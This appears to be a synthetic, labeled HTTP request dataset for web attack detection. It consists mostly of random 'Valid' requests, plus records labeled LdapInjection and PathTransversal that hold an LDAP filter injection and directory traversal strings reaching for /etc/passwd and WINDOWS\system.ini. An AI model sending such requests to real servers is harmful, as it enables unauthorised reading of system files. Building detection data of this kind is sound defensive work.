ETag: "RuPs3VGzuim5Bb1f"
Expect: aunieea5
From: eohgx@txte4.gov
If-Modified-Since: Sun, 15 Oct 06 01:06:09 UTC
If-Unmodified-Since: Fri, 28 Mar 08 24:17:50 CET
If-Match: "@PEhNeE1VxDONJwJyohy"
If-None-Match: "t7lMfbCtxG07YP26ySBl"
If-Range: "sJ_eb-nq7s0MA0T"
Max-Forwards: 4066
MIME-Version: 0.4
Pragma: cc=ela
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: deaax dotros=eyiry
Range: 676-
Referer: http://www.etOtgni.com/ivso/hqe5hpyt/sCyaweT.msf
TE: trailers,chunked,gzip;q=0.9
Trailer: Authorization
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 3.2; aj-oa; rv:0.7.3) Gecko/76819180
UA-CPU: MIPS
UA-Disp: 779,0995,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 211x6880
Via: HTTP/6.3 245.92.75.31:62666, HTTP/6.1 100.42.226.146:04909
Transfer-Encoding: identity
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 4864116530046414
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17457
Start - Id: 7464
class: Valid
POST /EX/bodyU_lFgncjechoN6lJAn/dizk/tSmtivwgRa0/i6zCgPf/nul9VUzn51/e8lnwIilmrs6w/a5hriardtwalwDlo/ucmdQia5SJyPW1/NoeebenidteteA/ePlAdoY8eNtHniar6.asmx? HTTP/1.0
Content-Length: 103
Content-Language: lcy
Content-Encoding: gzip
Content-Location: /weolsue/maoNa6nE/1tarrw0i.css
Content-MD5: aGMzbm9Uc2VkY29lM0J1QQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Dec 07 07:31:33 CET
Last-Modified: Tue, 13 Dec 05 09:00:30 UTC
Host: 39.46.227.188:5
Connection: ilYstd
Accept: */*
Accept-Charset: iso-8859-3, windows-874, cp-932, windows-1257;q=0.0, windows-1257;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: RtrH=en
Client-ip: 104.160.13.173
Cookie: ahs=seaotlib;uIltnTRnyre6e=uN6E-5JeXU
Cookie2: $Version="24"
Date: Thu, 26 Feb 09 17:42:24 GMT
ETag: "WGe7-zYKUlhh0kn@YUc3"
Expect: rZidtmh
From: simeoAtp@bzmstxmta.de
If-Modified-Since: Thu, 18 Sep 08 15:18:15 UTC
If-Unmodified-Since: Wed, 12 Oct 05 06:32:53 UTC
If-Match: "v1N_O.kUYo.FEcJ"
If-None-Match: *
If-Range: Sun, 03 Sep 06 14:08:16 UTC
Max-Forwards: 0
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM dDFyZGhPbGkzSG5udWFPdG9zdGk5b2VxZmhkckVvZW5lZGll
Authorization: Digest uri=http://xyhr4w.cz/T6att.mp3
Range: -471
Referer: http://eyoomOa.uk/toswrWho/Oodusay.php3
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: emqoubaio
UA-CPU: PowerPC
UA-Disp: 634,725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 871x804
Via: 6.3 www.atdidest.js
Transfer-Encoding: deflate
Upgrade: omrin/0.6
Warning: 422 www.rinltnh.jpeg "aiAkn" 
X-Forwarded-For: 46.39.95.124
X-Serial-Number: 119603156999
----: -----------
~~~~~: ~~~~~~~~~~~~

Iaaay1scantsgt=tlibsaeS9rhssw&iot=2187&ceyW1ji=ehi&Ej52lFYgjrQ=47761&hreeneCe1rm=a9B7szc5wR&A@Pl.S=2406

End - Id: 7464
Start - Id: 38278
class: LdapInjection
GET /adAoptnstdin/7wl9/cDH4zlhSKwBxFrxOC5/oabsuanpihTiToyo/iqK0BobjectvgyS7nd/neg7vsimb/uw_Ff-7/tA6ojRefDXZxP-XvADxy/ka8aJbXD_C983_AZ/oDL/4TAl5sinsertmochaiva4zE-/ehEqM7.jsp?il1shjeborlu=469&ranullLt=%29+%28+%7C++++%28++++cn%3D*o++++%27brien*+%29%28mail+%3D*o+++%27brien*++++%29&hKiid=ndbdcystmpt%287et&snsur6tctpwcie=jg%40iiaiysiergroup+bya&alJBD=u+u4o&itadBIbeE=oVPh2h1XIMi HTTP/1.0
Host: 154.136.204.254
Connection: keep-alive
Accept: audio/x-wav, application/rtf;q=0.1, audio/*
Accept-Charset: utf-8;q=0.2, ks_c_5601-1987;q=0.2, iso-8859-9;q=0.8, iso-8859-15, us-ascii;q=0.1
Accept-Encoding: compress;q=0.4, compress;q=0.1, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 227.248.33.223
Cookie: h8n=38
Cookie2: $Version="09"
Date: Tue, 29 Nov 05 10:15:18 GMT
ETag: W/"-Hht-R8UXNeiOEIFFnX"
Expect: ggulohsa
From: iaon@um9ltetugp.biz
If-Modified-Since: Fri, 18 May 07 18:16:33 GMT
If-Unmodified-Since: Mon, 23 Oct 06 14:57:08 UTC
If-Match: "XdH2l0gCAt6oyvun6"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="mscm"
Authorization: foo83 eitO=Eectedv
Range: 14-
Referer: /elienfco/Rles/jeis/ecares5.gif
TE: deflate,chunked;q=0.7,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 9.1; ea-cn; rv:5.3.5) Gecko/11753348
UA-CPU: PowerPC
UA-Disp: 284,6564,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4041x0261
Via: HTTP/2.2 www.ue71f30o.css
Transfer-Encoding: gzip
Upgrade: ndiqn/4.2, cma/1.9
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 165.116.155.114
X-Serial-Number: 830013506
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38278
Start - Id: 9467
class: Valid
GET /eto/icPW6VM/aUgZUDX6UzTy/7_topt7CGOdK@/efoamRumaxoGoe/20K9NsgdmRVtApn/dknafdtoe3ss/aniw/r26WRa6WCW_/sr9h/0cxViWA0/micNmasoc5ui.bin?ecznnoxu8ne=orhtacces+HthIsrhtbin5k&jgotktldnkteLd=51184&tce=adr%7E&cERsimdiaeAu=%26d+igfcvet HTTP/1.1
Host: 81.221.103.81
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3;q=0.7, us-ascii;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: lfLl9id-hSllhp2
Cache-Control: eror='u'
Client-ip: 144.121.224.176
Cookie: Wxp_DserviceswEX@vp5=3724090;etlG=hs' guB4i/rylinke6t
Cookie2: $Version="20"
Date: Sun, 28 Aug 05 10:27:23 GMT
ETag: W/"XiIcXiKCk8hDam_W-6xj"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Mon, 02 Jun 08 23:07:42 CET
If-Unmodified-Since: Wed, 16 Aug 06 14:49:29 CET
If-Match: "nf9f8nE9DX@qOg6u"
If-None-Match: *
If-Range: Thu, 16 Feb 06 09:17:09 GMT
Max-Forwards: 5998
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic eXdibHRhOmJhNmg1eXQ=
Authorization: NTLM dGxuZWFjZGF5aW51OGVsZXV3c3hjcng3Y25VN3VOR2Flb2VvZnJu
Range: -6,7-441
Referer: http://sOhSr.org/sleq/enhY2l/hucbegl.exe
TE: chunked
Trailer: Date
User-Agent: Mozilla/7.5 (X11; U; Linux i586 5.5; 80-wn; rv:9.9.4) Gecko/57917225
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: 7.7 www.notcDe.jpeg:96, FTP/3.2 163.60.58.62, tyRT2/1.9 104.108.197.122
Transfer-Encoding: gzip
Upgrade: ut102i/8.2, To5/4.6, ateLf/6.2, raEft2/9.6, tutT/1.1
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 140.234.18.98
X-Serial-Number: 010314665963317809
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 9467
Start - Id: 33034
class: Valid
POST /NEnctaie4iee/OaLPGco@ruQkiS/oPqFuFS5TBsKdWK/6NacGERKb/Y7Wty12q.js? HTTP/1.1
Content-Length: 124
Content-Language: tonrzi2,6gfsll
Content-Encoding: deflate
Content-Location: http://rtla2oLy.biz/jdr5c/uthiset/scc5te.asmx
Content-MD5: cFNjaWM0aWZzaWlzUmVyVA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Nov 05 16:21:47 CET
Last-Modified: Fri, 05 Sep 08 07:43:14 GMT
Host: 123.63.132.229
Connection: aseeecn
Accept: text/*;q=0.3, video/mpeg
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 68.106.142.25
Cookie: derRxzmeonoh=i;p-24ftptmpn@Oin1x=5074
Cookie2: $Version="6"
Date: Wed, 18 Nov 09 10:20:39 UTC
ETag: W/"whLlH22e.ou1i97.T9O1"
Expect: aldrq7oa=byxdna;n6w6=iisr
From: etht@e9emo1dtn.net
If-Modified-Since: Wed, 02 Feb 05 20:06:21 GMT
If-Unmodified-Since: Wed, 30 Mar 05 11:44:12 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Apr 04 16:19:47 GMT
Max-Forwards: 55
MIME-Version: 2.6
Pragma: tertTHf=Nu
Proxy-Authorization: Digest nc=7ddAF13D
Authorization: Digest username="3afn"
Range: -653509,070-
Referer: http://hgaamnF9.biz/nhslrHgj/tx3cds/htdard.php4
TE: deflate;q=0.7,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 7.3; n3-jr; rv:9.7.0) Gecko/11693128
UA-CPU: StrongARM
UA-Disp: 8116,2322,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 699x4175
Via: FTP/1.2 174.217.163.106
Transfer-Encoding: 7mid; apgaeyry=mcut
Upgrade: ceysO/0.3, sherw/9.0, 9Ojtfs/4.0, eslfme/3.1
Warning: 720 www.bomrenrn.tiff "ffytyrieot" "Sat, 25 Jun 05 21:01:28 CET"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 01279486631284
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

oieeeDnxNbln6mc=tsysteme&aHanCagu=ihn9n&al=4234066687&Kjsor8i=74&wfitimrtvi78ds=Oceliker=uel6twgetoc-&emjeonantnAe=so%hi

End - Id: 33034
Start - Id: 6309
class: Valid
PUT /t2aiwnfhoftnrinM/eSyE08uiU52HhtwL_U.tiff? HTTP/1.1
Content-Length: 127
Content-Language: soeh,h2s,4aNs
Content-Encoding: compress
Content-Location: /Xe8tnoH/sdoflx.jsp
Content-MD5: dWhuTnQ2b3RzRXBzY2l3ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Dec 09 16:14:13 CET
Last-Modified: Tue, 04 Oct 05 23:04:19 UTC
Host: www.eeyyv.st
Connection: keep-alive
Accept: application/postscript, video/*
Accept-Charset: windows-1255, windows-874;q=0.9
Accept-Encoding: 
Accept-Language: sf-m4pt;q=0.1, tm0yOO-o, otaccei-5a440g4, a-fNeeAl
Cache-Control: no-store
Client-ip: 79.115.102.49
Cookie: hndunq4n=cDu4~trr3epq
Cookie2: $Version="07"
Date: Sun, 01 Jun 08 11:36:09 CET
ETag: "-Zl8NTU7iqojl84mz"
Expect: mfrS5hN=dtneuo;dtrlecm5
From: 3ilmmBp@seiiyo.net
If-Modified-Since: Sat, 02 Sep 06 08:01:43 CET
If-Unmodified-Since: Fri, 12 Feb 10 07:11:23 CET
If-Match: "5.w@OQbllvxajSVGDfi"
If-None-Match: *
If-Range: Tue, 17 Apr 07 22:24:41 UTC
Max-Forwards: 240
MIME-Version: 0.0
Pragma: iar8dt=lms
Proxy-Authorization: Basic ckxSdDY6MGxpaGQ=
Authorization: Basic cGVhcmUzbjg6dDRzcg==
Range: -9,4-
Referer: http://www.lEtpcr.it/ca6Kstn/Isra/gnXr/eetaa.wmn
TE: gzip
Trailer: Date
User-Agent: pUkK1ocZi http://www.nttccO.fr
UA-CPU: 68000
UA-Disp: 2381,870,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 679x627
Via: 1.6 www.dn8lenea.css, 8.0 www.t2nas.html
Transfer-Encoding: identity
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 3514931111660103
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uu8js=ettZmjefifcswn9&WscCO_3X8HR=o&eacYov=0te6q3(ydm &SvrOvNe11=tssmuoodw6lsg4&mveaeHm=aoremnengosGa&inyutqbgetsti1r=i8kIGnN

End - Id: 6309
Start - Id: 8585
class: Valid
GET /e5ksdf/_UHL56Vd3h/orstdisll21or/i7GgZSOeIZ3YXHcTz.aspx?ltseey4ild=mMD%3Anfromfsxtermkdidivg%3Aeeedivps&bj=48637713 HTTP/1.0
Host: www.metz6are.biz
Connection: close
Accept: text/*;q=0.2
Accept-Charset: windows-1252, iso-8859-8;q=0.6
Accept-Encoding: *
Accept-Language: sgev-B6v52e, roa9hsd-n
Cache-Control: no-store
Client-ip: 18.15.137.84
Cookie: wtcnana= bee;53s=tBehJ7Sx;nziqa8ris=chrn;s8rAqat4sceeeCe=uott2nygohonktbt
Cookie2: $Version="9"
Date: Tue, 28 Nov 06 21:20:26 GMT
ETag: W/"qiL6zdz3s8AyO6njCD"
Expect: 100-continue
From: ebpee@y0et.gov
If-Modified-Since: Wed, 14 Sep 05 01:06:33 GMT
If-Unmodified-Since: Sat, 05 Feb 05 13:43:10 CET
If-Match: "pSI9.JEa6v1XRZVy"
If-None-Match: *
If-Range: Tue, 25 Jul 06 09:27:02 CET
Max-Forwards: 6958
MIME-Version: 8.0
Pragma: mtrLeyhg=iheoa
Proxy-Authorization: NTLM RWUxYWVxcnJzaWt3ZWxzZHVpZW1kZXJzaW00bWZyenNpcmxpbWVpOWY2Ug==
Authorization: NTLM aXJhcmV5ZXRzbG50MGloenJpOXRpbGU0eXRyYXVhUnJ4MHQx
Range: -281,776-17139
Referer: http://a9i6m.st/hcsoi/4nn0T/tswban/luna.jpeg
TE: deflate,deflate;q=0.5,gzip;q=0.8
Trailer: Connection
User-Agent: Mozilla/5.3 (compatible; Konqueror/5.1; SunOS sun4u; oarnE)
UA-CPU: Sparc
UA-Disp: 692,9024,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 783x6311
Via: FTP/5.6 185.250.45.223, ixtn/8.0 5.0.129.170
Transfer-Encoding: compress
Upgrade: PxnR/1.4, fotka/2.5
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 130.166.17.51
X-Serial-Number: 1101244
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8585
Start - Id: 28731
class: Valid
GET /ecoSdNothfrUintr/rseD7hRev4ap2t/iF-JKOobr-174ELVQJGw/nDg_jp6/s2Mca-63labXN/sTgrtregs/eeedD4hma.css?5aatmadj=cperlhi%3AaoyotR&WmNe=6783&Rtbe=071&bigkdhHnuNEgo=767601&t6Ihtnri=%3Fr%25q%3Be&dzrhieettcnr=zoeltnnd00har&jm=6&snsnmeeqr=s%3C&fsthH=d%40abni2ielc&iselti=vaO&rdqsqetljeenn=rtrcpAlpassthruh8tyl&8-N4lFV=171&wL0aWIml=oeohllht%2Fldqinsawio HTTP/1.0
Host: 187.64.60.102
Connection: keep-alive
Accept: video/*, video/quicktime;q=0.5, application/x-tar;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, compress;q=0.5, gzip;q=0.5, identity, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 5.184.170.107
Cookie: Vohoerh=7160679;1itHHnmwnobatrt=m0metas;sdturlb=0566162942;ZaSYVQBSE2=lhsumdtamFn;xzUC-=a?qen>gdqNmochaEs
Cookie2: $Version="3"
Date: Sat, 22 Jan 05 20:30:37 UTC
ETag: W/"._uVi_rDyxI380G"
Expect: zd8elms
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 15 Apr 10 03:53:28 UTC
If-Unmodified-Since: Thu, 01 Jul 04 22:59:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 037
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic cmg5ZkF1ajpjYWFlb2lU
Range: 10-84444,513066-364
Referer: /hc57shg/6ieyle1/sckSoaae/cs8sd.dll
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.0 (X11; U; Open BSD i586 2.9; pt-el; rv:4.5.9) Gecko/66802352
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 621x541
Via: 8.8 www.vnidndc.html, 4yq0/4.9 www.theroi.tiff:7637
Transfer-Encoding: compress
Upgrade: EeX/0.3, uAg/6.3, nind/4.1, aeaaEi/8.5
Warning: 642 11.210.65.54:24773 "arbhrinytrt" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 28731
Start - Id: 36340
class: PathTransversal
GET /P0dVJ3p976z/r0@kVVJFcDZ/8l7aoxn8dmkrcrl/aWZQGDja5j2uw41fY/mnE6teuifrvgeNdt/6Nttiacccsodm4eoRaeu.sh?dn1Plaeoe6hTarl=79iasrffnHoCEt1t&S0PTFmO-YKS=cr2&cl=%24&lmreOlvtnyr=AatDwpa&oeszlexMzm=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&tmeetan=se&aec=Syag81ioismh&Tipoh=aKZD&lntwgsxdC=shutdowncX%25ui&tlett=4lTha&ofOavhSit=8781271429 HTTP/1.0
Host: 105.120.60.90:80
Connection: keep-alive
Accept: video/*;q=0.8, image/*, text/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=5501
Client-ip: 107.68.34.220
Cookie: uhtzeroi=2845;gsp2isruApo0OpL=361209;oftltijegosecM=9530;qdoi=8;8xftXwinntDk=dh>r\
Cookie2: $Version="4"
Date: Wed, 11 Oct 06 03:43:12 UTC
ETag: "f_dWPolUpoqzHUEzy"
Expect: 100-continue
From: ee11@seia.cz
If-Modified-Since: Mon, 22 Nov 04 22:46:20 CET
If-Unmodified-Since: Sat, 19 Aug 06 22:42:12 CET
If-Match: *
If-None-Match: *
If-Range: "0W1qai27wuJFw3Qaz1j3"
Max-Forwards: 890
MIME-Version: 4.2
Pragma: ptogtz=oh
Proxy-Authorization: Digest response="Fa230DfDdCBDc8d6dFdD9e980dE5c6ab"
Authorization: Digest cnonce="kaddeh"
Range: -200006,-0
Referer: /ucpE/o2t0tue/am0bnryr.cfm
TE: gzip;q=0.0,chunked
Trailer: User-Agent
User-Agent: RttAssgt (yOaklD; zTAVdCU; 3UDwT9w)
UA-CPU: StrongARM
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 626x911
Via: 9.2 www.ebbnyeEk.jpg
Transfer-Encoding: deflate
Upgrade: xhro/0.6, 5yhnq/4.8, ojie/5.8, Hdwnh/1.0, slF/5.9
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 9001886715622
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36340
Start - Id: 19607
class: Valid
GET /utsmiHszurawanortu/V8I@/iXbGjFYLDA.asp?agnerdjtnscGrk=fwNyY&ec4O=O%3C&seosp=284094&RjallL96bH7ag=lUemudc%2FO0ol&JuS1y841d=%3En%26&odxeRrecttonqrO=en%7E9perloi4arUly%5B&da=obetweenfi&5anegssjp=ciebgiminRsr&Uatqndb=hiTi HTTP/1.1
Host: 155.201.163.89
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip;q=0.0, gzip;q=0.0
Accept-Language: a1e7-b3
Cache-Control: only-if-cached
Client-ip: 147.175.11.94
Cookie: imgkS0z=iu=e
Cookie2: $Version="32"
Date: Mon, 26 Jan 09 06:50:46 UTC
ETag: W/"cXnqhfvLlyq5X8-kHkn"
Expect: rteasasb
From: widc@tloe.fr
If-Modified-Since: Fri, 04 Nov 05 11:14:14 CET
If-Unmodified-Since: Sat, 07 Jul 07 09:34:10 CET
If-Match: "4Vl2g7@RetRLomXdFZ"
If-None-Match: "3denmoM9Y10mPwga"
If-Range: "WLGI5oAmeYCPL-h8"
Max-Forwards: 63
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: Digest uri=/dofn.doc
Range: -4,298-
Referer: http://amdm.be/gpdae/Terdo/stsa/ikttbt/2pit.jpg
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: uzZr1m6HM7 http://www.2ks5h.be
UA-CPU: PowerPC
UA-Disp: 119,8274,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2031x847
Via: 3.1 www.iESddlT.tiff, HTTP/7.1 72.98.100.201, 7.5 161.28.173.151:5966
Transfer-Encoding: svrs
Upgrade: et8/0.3, eCeto/3.7
Warning: 605 www.dnne.shtml "oI3esi8tekNt" 
X-Forwarded-For: 65.139.75.217
X-Serial-Number: 35644174748471115443
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19607
Start - Id: 21875
class: Valid
GET /9ChntaoO/oyeqq5T/mbwte/fILie-/ooro/o.KIz0B0t4/aaMinetsnhris/fFOkzK-hXjD0eT.php?tkimdQ=4456277&ra=as+s&iporn2=th5a&ule0nshn=eR2p2%3Dni&uxiN2serehsne=rhroieigdrsron&W33PO_ZgH5=copyt%7Cd%3Barmlid&iptAxeqd=%3Cist%25datuL&wPdivgPDQinsertfDS@=+dt5ko91l+aof%3A&sSEg=ngoXti0ija&JKOFJ9AY=tTblrl+o&nwth=lGD7APF&re=a&densamuOa1cH=229632 HTTP/1.1
Host: www.atnhbee.fr:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, windows-1255, x-mac-chinesetrad;q=0.1, x-mac-greek;q=0.6, x-mac-ce
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 124.23.154.34
Cookie: st=1;cksonutle2wqnnq=63;lnnAbtxqniretd=tl
Cookie2: $Version="53"
Date: Sat, 26 May 07 13:16:17 GMT
ETag: "s9YaKD-sFwJHQ94s"
Expect: Idr4oo=neMZhs;hco8c4ez=Ri9apu3l
From: gspde@ia3eGzume.be
If-Modified-Since: Thu, 15 Jul 04 04:15:08 GMT
If-Unmodified-Since: Mon, 10 Oct 05 12:21:11 CET
If-Match: "hBuC-wQR5LzNGspd-X3"
If-None-Match: "fc.vSaKu5P3Ei6hh.O"
If-Range: "5Meqdj9eimp2KmKwN"
Max-Forwards: 24
MIME-Version: 2.2
Pragma: 7eodLboo='hqtga2L9'
Proxy-Authorization: iele gsycpn=cveretgu
Authorization: fn3A oquea=azen
Range: -34244,001-
Referer: /a2Gn3/wghee/Eicny/ceoNbrR.php4
TE: gzip,trailers
Trailer: Upgrade
User-Agent: 5.OCyj67 http://www.shees3Z.net
UA-CPU: StrongARM
UA-Disp: 649,1976,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5382x0739
Via: FTP/3.9 214.225.58.82
Transfer-Encoding: toey; Afen=pansud7
Upgrade: foarn/6.0
Warning: 810 48.19.38.105 "wocweaael2R4t" "Mon, 17 Nov 08 22:16:35 GMT"
X-Forwarded-For: 180.152.252.21
X-Serial-Number: 0932215457430057404
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21875
Start - Id: 36181
class: PathTransversal
GET /hJPIiZWJiUD1Nf/group by.ua@R2-4/tieA1araaompu/tBWlC4fyMup41c/jcc/ooev/ibkby/iuS/tvmocsi8dlennd.asmx?bdukeq8e7ebcwih=1067612&IrnluDeifuaw0ws=0ke&Aaito4iFah=rLysvnKK_&-QvT_AGSx4=kfrom%28h3&lictrhhmc=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&aetcW5o=oservicesroxveqjort&xwlnrrle=7&neae=6020&7ortselte=9aaimhe+rtw HTTP/1.0
Host: 28.57.69.25
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, gzip, deflate;q=0.8, deflate;q=0.8, gzip
Accept-Language: orvsTP-2tVpr, 5the-o, vo-1ji, eii-tdktt;q=0.0
Cache-Control: min-fresh=94220
Client-ip: 164.124.198.233
Cookie: hJevtlhaott=70512055;eedr4EmO=o]ae$;2W1juoWXlocation7=2942
Cookie2: $Version="19"
Date: Thu, 14 Jan 10 14:45:44 CET
ETag: "3ylimbTILOvC4rZIZ"
Expect: oss8oa
From: hseoct@sy2ts.fr
If-Modified-Since: Mon, 14 Nov 05 23:19:34 GMT
If-Match: "-M4HgsDwz.LEKgF"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 4.5
Pragma: ar838e=e
Proxy-Authorization: NTLM bHFrZW5keUxveWNlN2RiMXJvTGVudXNzM25ycXllbXJ1cGF0
Authorization: Digest cnonce="g1eaaho"
Referer: /ozarnp/smkqaj/ue5ithee/ruoVolxt.jpg
TE: chunked;q=0.5,gzip;q=0.0
Trailer: Authorization
User-Agent: 9ztctGHbtwotheO1lyae
UA-Disp: 608,426,32
UA-OS: Win9x
UA-Pixels: 0116x5631
Via: HTTP/0.6 55.198.101.205, 4.9 201.107.203.119:48012, 8.0 181.15.127.218
Transfer-Encoding: identity
Upgrade: aehn/9.5
X-Forwarded-For: 143.21.25.63
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36181
Start - Id: 14860
class: Valid
GET /E3rr/rDn.html? HTTP/1.0
Host: www.ieai6ee.gov
Connection: close
Accept: video/*;q=0.2, text/*;q=0.0
Accept-Charset: x-mac-turkish;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-age=33043
Client-ip: 138.69.215.50
Cookie: L9rfsrzElioi2a=opasswd;qXX@gF=rbetlel;svdhoin=passwddropbph;td0auvwotwE8=489362047
Cookie2: $Version="63"
Date: Fri, 23 Jul 04 01:43:52 UTC
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 100-continue
From: doomanl@8w3rc.it
If-Modified-Since: Tue, 11 May 04 02:02:59 UTC
If-Unmodified-Since: Mon, 21 Aug 06 07:05:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM N2V4ZW1zd2hvZmFlMGVpaTJJRTdtamJmbmlVZWF0ajNl
Range: -43,-61335,692292-223
Referer: /tnzrnae/lasplZee/oofwnrne/htia0tb.php3
TE: chunked;q=0.1
Trailer: Referer
User-Agent: owjRpT http://www.m80dar.uk
UA-CPU: 68000
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: eGa2/0.8 88.77.140.12, HTTP/2.1 www.Yfobb.jpg, 5.9 www.hste.html
Transfer-Encoding: compress
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 883982110
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14860
Start - Id: 40702
class: SSI
PUT /osqrobalcAxdrn5ai/63rpTtsr7ARU/8e2/e2rc4o/umRaylrhdktcnfiKc/wrii/stmedaltfy6tc/dMtvNj35@/ew8zMVF31.php3? HTTP/1.0
Content-Length: 249
Content-Language: o,atand,nreDeto
Content-Encoding: compress
Content-MD5: YXAyZXdsYTdpYm5vN2F0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Apr 10 07:48:26 UTC
Host: www.1ietse9le.ch
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.8, ks_c_5601-1987;q=0.0, cp-932
Accept-Encoding: *
Accept-Language: *
Date: Sat, 10 Sep 05 20:24:27 UTC
ETag: W/"Ie9Fz2p0vgERMQr3."
Expect: herukth
If-Modified-Since: Sat, 13 Mar 04 23:01:31 CET
If-Unmodified-Since: Sun, 22 Mar 09 12:31:14 UTC
If-Match: "i4niuka0HnQVw.S4sGTW"
If-Range: Fri, 25 Mar 05 14:35:28 GMT
Max-Forwards: 152
Pragma: no-cache
Proxy-Authorization: NTLM b290aXJ1aGZhN2lkYVRzb2k3UmVjdGl0c3llaGhTa3NhdGhjaWhpaUlpY250
Referer: /gmvnnnti/eeaO.msf
